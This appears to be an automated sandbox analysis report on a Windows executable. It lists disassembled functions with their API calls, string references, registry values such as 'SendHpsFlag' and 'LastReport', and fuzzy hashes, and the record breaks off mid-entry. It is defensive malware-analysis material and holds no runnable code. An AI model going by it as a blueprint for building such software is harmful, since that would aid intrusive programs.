Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalMutexObjectReleaseSectionSingleWait$EnterEventLeaveReset
String ID:
API String ID: 2242600547-0
Opcode ID: 0a0f7eafa2fdadbc9ac8ab9d9296540b5b8c11878dd6768fa4a54827db15c95b
Instruction ID: 421bd33604f49ddef9562eebca4294a3aa0cbd6969fba6712d81f86565da5362
Opcode Fuzzy Hash: 0a0f7eafa2fdadbc9ac8ab9d9296540b5b8c11878dd6768fa4a54827db15c95b
Instruction Fuzzy Hash: 7FF03176500B019FC7309BA5DC88D67B7F8BFA9351304481DF545C3620D734E846DB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040D840, Relevance: 9.2, APIs: 6, Instructions: 189filethreadCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040D8C7
GetCurrentThreadId.KERNEL32 ref: 0040D8FE
VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040D97E
GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000), ref: 0040DA69
GetCurrentProcess.KERNEL32(00000000), ref: 0040DA70
CloseHandle.KERNEL32(00000000), ref: 0040DA87

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Current$Process$CloseCreateFileHandleQueryThreadVirtual
String ID:
API String ID: 2824296062-0
Opcode ID: d4749db79e9684bf582b97681789aae3ca033e23cf7176db35f38d2e736985d9
Instruction ID: c4c7a1ac73d950067c95b8c86b82b60a122b47cbf9920de9c753e596b953d095
Opcode Fuzzy Hash: d4749db79e9684bf582b97681789aae3ca033e23cf7176db35f38d2e736985d9
Instruction Fuzzy Hash: 5A7146B5A083409FD724CF65C880B9BBBE5BFD9700F048A2EF99993390D7749909CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004104E0, Relevance: 9.2, APIs: 6, Instructions: 152COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00410540
PathCombineW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041056F
_memset.LIBCMT ref: 00410583
PathCombineW.SHLWAPI(?,?,?), ref: 004105AA
PathFileExistsW.SHLWAPI(?), ref: 00410644
PathFileExistsW.SHLWAPI(?), ref: 00410659

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$CombineExistsFile_memset
String ID:
API String ID: 2581113554-0
Opcode ID: b629c4920a53c7b5a3595ba8c97d678fa25259f16e1829fea87cd9b47372c0fe
Instruction ID: 8c766e44382b22b2bc62d4ced1a7578c34ddcf9ea0c6c8ada85d9784da93907a
Opcode Fuzzy Hash: b629c4920a53c7b5a3595ba8c97d678fa25259f16e1829fea87cd9b47372c0fe
Instruction Fuzzy Hash: 43519FB15083459BC720DF15D981AABB7E9FFC9704F40492EF58987240E778E988CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004023E0, Relevance: 9.1, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 0040241C
CharNextW.USER32(00000000,?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 0040243D
CharNextW.USER32(00000000,?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 00402456
CharNextW.USER32(00000000,?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 0040245D
CharNextW.USER32(00000000,?,?,00000000,?,?,?,00402EFA,09D48295,?,?,?,?,?,00510206,000000FF), ref: 004024A8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: a4eb61da0eeef5befef620cc4837072a271862b1a6a184ec6dc6cee83ed2fc41
Instruction ID: 016fb98a43e036d45944d59fcd2c91a011f2a73f7fcd71db903160db5305221b
Opcode Fuzzy Hash: a4eb61da0eeef5befef620cc4837072a271862b1a6a184ec6dc6cee83ed2fc41
Instruction Fuzzy Hash: 4041D0312142128ADB249F38DD58577F3E2EFA83207A4497BD486D33D5EB79D881C358

Uniqueness

Uniqueness Score: -1.00%

Function 00449130, Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

PtInRect.USER32(?,00000000,?), ref: 00449150
SetCursor.USER32(?), ref: 0044915E
InvalidateRect.USER32(?,?,00000001), ref: 00449181
UpdateWindow.USER32(?), ref: 0044918B
InvalidateRect.USER32(?,?,00000001), ref: 004491BE
UpdateWindow.USER32(?), ref: 004491C8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$InvalidateUpdateWindow$Cursor
String ID:
API String ID: 3954524864-0
Opcode ID: d12b200c32b13d86e1f9707dd766fc59520183eaf6649180b29eb6220a66ff91
Instruction ID: 320ca2cb0a060c2bf1e68fa87ab96ff91d23641da2df349f6b2daad57b98669b
Opcode Fuzzy Hash: d12b200c32b13d86e1f9707dd766fc59520183eaf6649180b29eb6220a66ff91
Instruction Fuzzy Hash: CE218E35204B409BF7348B24D99CBA7B7E5AFA5705F04890EE58386B50C778E846EB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7A0, Relevance: 9.0, APIs: 6, Instructions: 37synchronizationthreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,0040D3BF,?,00000000), ref: 0040D7A8
LeaveCriticalSection.KERNEL32(?), ref: 0040D7B8
GetCurrentThreadId.KERNEL32 ref: 0040D7C5
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 0040D7F0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D7FF
LeaveCriticalSection.KERNEL32(?), ref: 0040D82A

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$CurrentEnterObjectReleaseSemaphoreSingleThreadWait
String ID:
API String ID: 1205197067-0
Opcode ID: e38428e854d45afc61d87f9f06e43de67265ad02cc97146fe7a655b6dbbf2b2b
Instruction ID: 79baaa9f0a53aa9e27f27ad7c72f6eec9246659c8cb09957444c974b842107d5
Opcode Fuzzy Hash: e38428e854d45afc61d87f9f06e43de67265ad02cc97146fe7a655b6dbbf2b2b
Instruction Fuzzy Hash: 4A010475105B009FE360CF74D858B97BBE5BFAA301F004A0DE1AA83294C774604ADB25

Uniqueness

Uniqueness Score: -1.00%

Function 004755F0, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 00407C30: _memmove.LIBCMT ref: 00407C63

Part of subcall function 00409F80: std::_Xinvalid_argument.LIBCPMT ref: 00409F93
Part of subcall function 00409F80: _memmove.LIBCMT ref: 00409FCE

std::_Xinvalid_argument.LIBCPMT ref: 0047594A

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

Strings

., xrefs: 0047575B
., xrefs: 004756B1
., xrefs: 0047576E
string too long, xrefs: 00475945

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument_memmovestd::_std::exception::exception$Exception@8Throw
String ID: .$.$.$string too long
API String ID: 3981141188-1442959683
Opcode ID: 4f2e3b5742b5ff572ca6b11cf189f1f834f18a5e8e585f09aa45944d2543129f
Instruction ID: 44a9676774161e9511a597d3ae3414a0438239f19e5078224608e8c1401bd93d
Opcode Fuzzy Hash: 4f2e3b5742b5ff572ca6b11cf189f1f834f18a5e8e585f09aa45944d2543129f
Instruction Fuzzy Hash: 3AB18F71508780DFD720DB25C840B9FBBE4AB85724F148A1EF4999B291D7B8D848CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00413580, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 004112A0: _memset.LIBCMT ref: 004112C0
Part of subcall function 004112A0: GetVersionExW.KERNEL32 ref: 004112D4

GetUserNameW.ADVAPI32(00000000,?), ref: 004136FE
GetUserNameW.ADVAPI32 ref: 0041372E

Strings

Google\Google Pinyin 2, xrefs: 004135E7, 00413698
data, xrefs: 0041362F
user, xrefs: 004136E0

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser$Version_memset
String ID: Google\Google Pinyin 2$data$user
API String ID: 1985856877-3533915005
Opcode ID: 4d2db4fbf90c960fd34f512f64070028c730ff97554f2b9dab26092f86ab723f
Instruction ID: a0548eec50796215629a505decba23d208db539897d0e366add197fe5549c658
Opcode Fuzzy Hash: 4d2db4fbf90c960fd34f512f64070028c730ff97554f2b9dab26092f86ab723f
Instruction Fuzzy Hash: 1D61CE716083419FC304DF29C881A5BB7E4BFC9324F448A6EF1A5873A1DB34E949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00442490, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 112registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 004424FD
RegQueryValueExW.ADVAPI32(09D48295,HpsFlag,00000000,?,09D48295,09D48295), ref: 00442543

Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218

Strings

hps, xrefs: 00442558
SendHpsFlag, xrefs: 004424EF
HpsFlag, xrefs: 0044253D

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$_memmove
String ID: HpsFlag$SendHpsFlag$hps
API String ID: 105235180-2996217291
Opcode ID: 06717c9a6bdd9ab520b4713cd60be72b45c5cc1a3081e0a65b6fe19edc8fbfe6
Instruction ID: 4e810b9e92dd8ba7b64699571f4282ee7b8400a40678d55ab0cbe6fd5e5c60e9
Opcode Fuzzy Hash: 06717c9a6bdd9ab520b4713cd60be72b45c5cc1a3081e0a65b6fe19edc8fbfe6
Instruction Fuzzy Hash: 9841BFB2508341AFD300DF65C99195BBBE4BF88758F400E2EF59593290EB78E908CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7B0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108registrytimeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,09D48295), ref: 0040C7F3

Part of subcall function 0040FD60: RegOpenCurrentUser.ADVAPI32(0002011F,?), ref: 0040FDE7
Part of subcall function 0040FD60: RegCloseKey.ADVAPI32(?,00000000,0002011F), ref: 0040FE1A

RegQueryValueExW.ADVAPI32(?,?,?,LastReport,00000000,?,?,?), ref: 0040C846
VirtualQuery.KERNEL32(0040C630,?,0000001C), ref: 0040C881
VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C897

Strings

LastReport, xrefs: 0040C838

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Query$Virtual$CloseCurrentOpenSystemTimeUserValue
String ID: LastReport
API String ID: 3011427647-1689103333
Opcode ID: f092f2b6b9f3b3eda3919f4950b21f078ee59004a635e80fe479ec8075a26c43
Instruction ID: 8d63e31aa063777fcd2de0668164f87e5b9f09b1f78c54ca1ff5966fafd036c0
Opcode Fuzzy Hash: f092f2b6b9f3b3eda3919f4950b21f078ee59004a635e80fe479ec8075a26c43
Instruction Fuzzy Hash: D441B472104305DBD720DF65C881B5BB7E8FB95715F008B2EF595A72C0D738D9098B8A

Uniqueness

Uniqueness Score: -1.00%

Function 004546C0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(version,?,?,00000001,004547FC,09D48295,09D48295,?,00000000,00000001,00454C09,?,?,?,?,00000001), ref: 004546C8
__wcsnicmp.LIBCMT ref: 004546D7
_wcschr.LIBCMT ref: 004546ED
_wcscspn.LIBCMT ref: 00454737

Strings

version, xrefs: 004546C5, 004546D5

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp_wcschr_wcscspnlstrlen
String ID: version
API String ID: 1656015000-3206337475
Opcode ID: f8882e25417b0b3f5c5daf84c9059597aef290c2d8759465c53625817e525b9a
Instruction ID: f6399a93393f416e53fda65f803d98572dffe701c013e98c4d0d672ba6abacdc
Opcode Fuzzy Hash: f8882e25417b0b3f5c5daf84c9059597aef290c2d8759465c53625817e525b9a
Instruction Fuzzy Hash: 58210A72B0131197C7315E69A84166BB7D89FD632BF04412FEC019F382E7B9DC898699

Uniqueness

Uniqueness Score: -1.00%

Function 004DC020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,?,00000000), ref: 004DC04D
GetSecurityDescriptorSacl.ADVAPI32 ref: 004DC077
SetSecurityInfo.ADVAPI32(00411713,00000006,00000010,00000000,00000000,00000000,?), ref: 004DC091
LocalFree.KERNEL32(?), ref: 004DC0A4

Strings

S:(ML;;NW;;;LW), xrefs: 004DC038

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Security$Descriptor$ConvertFreeInfoLocalSaclString
String ID: S:(ML;;NW;;;LW)
API String ID: 3116297227-495562761
Opcode ID: 20c621f91dd23f68c4e87ab4d6d4af3db756e709a316be991a121808763bed1f
Instruction ID: 39f20bfab458b56077784ced127aa480e53c69e6edb392c3eb8d1f091dcd45c7
Opcode Fuzzy Hash: 20c621f91dd23f68c4e87ab4d6d4af3db756e709a316be991a121808763bed1f
Instruction Fuzzy Hash: 8911A7B1108345AFD310CF65CCC4A6BB7ECFB99754F044A1EF59982240D631D909CB67

Uniqueness

Uniqueness Score: -1.00%

Function 00401370, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,80000002,004016BC,80000002,00000000,80000002,?,00000007), ref: 0040137F
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0040138F
RegCreateKeyExW.ADVAPI32(00000000,0040FE89,00000000,00000000,00000000,80000002,00000000,00000000,00000007,80000002,004016BC,80000002,00000000,80000002,?,00000007), ref: 004013D4

Strings

Advapi32.dll, xrefs: 0040137A
RegCreateKeyTransactedW, xrefs: 00401389

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1964897782-2994018265
Opcode ID: f14f6842351e7fc127a8682271ffae625ca2bc0d3a5a4b63f2d56d538be0232e
Instruction ID: 14b45fa2778c8e70cbe2d3c27c4b948390936c226cce1522ddc102b0ad5643c2
Opcode Fuzzy Hash: f14f6842351e7fc127a8682271ffae625ca2bc0d3a5a4b63f2d56d538be0232e
Instruction Fuzzy Hash: 13011D71380304BBF6308B51EC45F2B77ADEBE5B41F24882DB644AA5D0C6B5B851C628

Uniqueness

Uniqueness Score: -1.00%

Function 00401300, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,?,00401734,?,?,?,00000000,?,?,004018A8,?), ref: 0040130F
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0040131F
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,00401734,?,?,?,00000000,?,?,004018A8,?), ref: 0040134E

Strings

Advapi32.dll, xrefs: 0040130A
RegOpenKeyTransactedW, xrefs: 00401319

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 1337834000-3913318428
Opcode ID: 16de537627375fab36f4173494bba9a1104928c6aa644c11ef20342db0ffa810
Instruction ID: b31e1b5ba696df3d850894863efb494575e397a49ed79b823cb6d633432f9dd1
Opcode Fuzzy Hash: 16de537627375fab36f4173494bba9a1104928c6aa644c11ef20342db0ffa810
Instruction Fuzzy Hash: D1F03031280309BBE3309B51EC49F6B7BADEFB2B40F14442DB595A65D0C675B854DB38

Uniqueness

Uniqueness Score: -1.00%

Function 00401860, Relevance: 7.6, APIs: 5, Instructions: 98registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401710: RegCloseKey.ADVAPI32(?,?,?,004018A8,?), ref: 00401753

RegCloseKey.ADVAPI32(?), ref: 004018B7
RegEnumKeyExW.ADVAPI32 ref: 004018EA
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00401924
RegCloseKey.ADVAPI32(?), ref: 00401939
RegCloseKey.ADVAPI32(?), ref: 00401959

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: c80c7845c30c815cdafa8d550c5c4a69cfcc0348ba4c5d87359d38f19516f412
Instruction ID: 08f73f14d58ffe26b89d61e59e7f9e4f10c2e7bfb860ec90889fba986843b4e9
Opcode Fuzzy Hash: c80c7845c30c815cdafa8d550c5c4a69cfcc0348ba4c5d87359d38f19516f412
Instruction Fuzzy Hash: 00313CB1109315ABC320EF59D884C9FBBE9AF99750F00492EF149D3250D734D949CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 004F6552, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004F6560

Part of subcall function 004EF45B: __FF_MSGBANNER.LIBCMT ref: 004EF474
Part of subcall function 004EF45B: __NMSG_WRITE.LIBCMT ref: 004EF47B
Part of subcall function 004EF45B: HeapAlloc.KERNEL32(00000000,00000001,?,?,00000000,?,004EF8F9,?,00000000), ref: 004EF4A0

_free.LIBCMT ref: 004F6573

Memory Dump Source

Source File: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 1da5acc769f7bb79b51364f62853b0b39876c0c015576dc218cd2cb0f587c42c
Instruction ID: ccf311ee06930b27e61ba274c881e0746a42b45171165be83f04db50c3405fbc
Opcode Fuzzy Hash: 1da5acc769f7bb79b51364f62853b0b39876c0c015576dc218cd2cb0f587c42c
Instruction Fuzzy Hash: A511C83240061CFBCB217B75BC05A7B3B949F65361B22162FFB48A62A0DA3C8945969D

Uniqueness

Uniqueness Score: -1.00%

Function 0043C390, Relevance: 7.5, APIs: 5, Instructions: 45synchronizationthreadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,00404C1B), ref: 0043C39F
WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0043C3AE
TerminateThread.KERNEL32(?,000000FF), ref: 0043C3C1
CloseHandle.KERNEL32(?,0052FD50,00000000,00404C1B), ref: 0043C3D6
CloseHandle.KERNEL32(?,0052FD50,00000000,00404C1B), ref: 0043C3E3

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$EventObjectSingleTerminateThreadWait
String ID:
API String ID: 3210639814-0
Opcode ID: a21adf9f2c7549ea4d718c2e7649cad65669d31d5d1ffce76961295457a449bf
Instruction ID: 164cf94120980fff968e7a6e03f15ac3806983c1e51a4ab42343a4d74772dd5d
Opcode Fuzzy Hash: a21adf9f2c7549ea4d718c2e7649cad65669d31d5d1ffce76961295457a449bf
